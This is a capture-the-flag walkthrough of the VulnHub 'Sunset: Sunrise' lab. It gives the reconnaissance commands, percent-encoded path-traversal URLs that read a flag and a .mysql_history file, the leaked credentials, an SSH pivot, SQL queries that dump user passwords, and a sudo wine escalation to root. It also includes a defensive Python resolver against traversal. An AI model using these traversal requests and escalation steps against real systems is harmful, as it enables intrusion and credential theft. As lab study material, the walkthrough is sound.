Sunset: Sunrise Walkthrough

Hello Everyone, let's begin

ctf link : https://www.vulnhub.com/entry/sunset-sunrise,406/

download link : https://download.vulnhub.com/sunset/sunrise.7z

I opened it with VirtualBox in bridged network mode with the interface named vmnet8 (172.16.59.0/24).

CTF level : Beginner

Vulnerabilities to exploit : OSVDB:721 - Badblue server

Technique and tools : Nmap, Nikto, Firefox, ssh, mysql

Total flags: 2

I found IP using arp-scan
sudo arp-scan --interface vmnet8 --local


I found IP of the ctf machine 172.16.59.142


I started scanning well-known 1000 ports and banner grabbing using nmap
sudo nmap -sSV 172.16.59.142


2 http services are running at port 80 and 8080.
I used nikto to collect useful information about them.
nikto -h http://172.16.59.142
nikto -h http://172.16.59.142:8080

Nikto didn't find any vulnerability at port 80 but port 8080 is vulnerable to path traversal.
So I tried looking into it and found my first flag
http://172.16.59.142:8080/%2f..%2f..%2fhome/sunrise/user.txt 
a6050aecf6303b0b824038807d823a89
FLAG1
Then I started fuzzing the directory for hidden logs and I found MySQL credentials.
http://172.16.59.142:8080/%2f..%2f..%2fhome/weborf/.mysql_history
Mysql Credential:
Username: weborf
Password: iheartrainbows44
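
For defenders: the two requests above work because the server percent-decodes %2f and joins the result onto its document root without checking where the path ends up. The sketch below is an added example (not part of the original walkthrough and not the server's own code) that puts that unchecked join beside a resolver enforcing containment; the /srv/www root and the function names are assumptions.

```python
import os
from urllib.parse import unquote

WEB_ROOT = "/srv/www"  # assumed document root (POSIX), not taken from the target

def naive_resolve(url_path, root=WEB_ROOT):
    """Decode and join with no containment check: the flaw class shown above."""
    return os.path.normpath(root + unquote(url_path))

def safe_resolve(url_path, root=WEB_ROOT):
    """Return the absolute path to serve, or None if the request leaves the root."""
    decoded = unquote(url_path)  # decode exactly once, then treat the result literally
    if "\x00" in decoded:
        return None
    root_real = os.path.realpath(root)
    # Force a relative join, then resolve ".." segments and symlinks.
    candidate = os.path.realpath(os.path.join(root_real, decoded.lstrip("/")))
    # Containment check: the resolved path must still sit under the root.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate

# Constructed sample: one normal request plus the two traversal paths used above.
SAMPLE_REQUESTS = [
    "/index.html",
    "/%2f..%2f..%2fhome/sunrise/user.txt",
    "/%2f..%2f..%2fhome/weborf/.mysql_history",
]

def blocked(requests, root=WEB_ROOT):
    """Requests that the hardened resolver refuses to serve."""
    return [p for p in requests if safe_resolve(p, root) is None]

if __name__ == "__main__":
    for path in SAMPLE_REQUESTS:
        print(f"{path!r:48} naive={naive_resolve(path)!r} safe={safe_resolve(path)!r}")
```

The same containment check also belongs in front of any code path that maps a URL to a file, such as directory listings and CGI lookups.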
I tried connecting to MySQL... but it didn't work.
So I tried the same credentials over SSH
ssh weborf@172.16.59.142

Now I'm local to the machine. I should try mysql again.
mysql -p


I should look for other credentials inside database mysql
use mysql;
show tables;
show columns from user;
select User,Password from user;

I got another user's credential:
Username: sunrise
Password: thefutureissobrightigottawearshades
Let's switch to this user to check sudo permissions.
su sunrise

Huh, it was easy. After getting into the sudoer user, I checked sudo permissions.
sudo -l
And I found that I have an application that I can run as root
(root) /usr/bin/wine
I thought, why not use cmd... it has been a while since I've seen one.
sudo wine cmd.exe
Wow, I'm root now.

On looking into root directory, I found the flag.
cd /root
dir
more root.txt

Finally I got the last flag.
24edb59d21c273c033aa6f1689b0b18
